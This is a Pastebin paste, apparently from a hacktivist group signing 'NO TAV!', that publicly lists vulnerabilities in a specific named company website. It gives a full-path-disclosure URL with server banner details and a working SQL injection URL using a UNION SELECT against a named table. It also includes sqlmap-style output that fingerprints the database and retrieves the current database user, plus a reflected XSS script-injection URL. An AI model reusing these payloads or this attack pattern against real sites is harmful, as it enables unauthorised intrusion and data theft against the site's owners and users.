Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- NO TAV!
- Con Sole e Baleno nel Cuore
- --- Full Path Disclosure
- http://www.ltf-sas.com/index.php?lg_visite=aaa
- Apache/2.0.54 (Win32) PHP/4.4.0 Server at www.ltf-sas.com Port 80
- --- SQL Injection
- http://www.ltf-sas.com/pages/articles.php?art_id=-1%20union%20select%201,2,3,4,5,version%28%29,7,COUNT%28*%29,9,10,11,12,13,14%20from%20ltf.articles
- [19:17:55] [INFO] testing MySQL
- [19:17:56] [INFO] confirming MySQL
- [19:18:00] [INFO] the back-end DBMS is MySQL
- web server operating system: Windows
- web application technology: PHP 4.4.0, Apache 2.0.54
- back-end DBMS: MySQL < 5.0.0
- [19:18:00] [INFO] fetching current user
- [19:18:00] [INFO] retrieved: ltf@localhost
- current user: 'ltf@localhost'
- --- XSS
- http://www.ltf-sas.com/pages/search.php?recherche=%3E%3Cscript%3Ealert%28%27NO+TAV%27%29%3C%2Fscript%3E&imageField.x=0&imageField.y=0
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement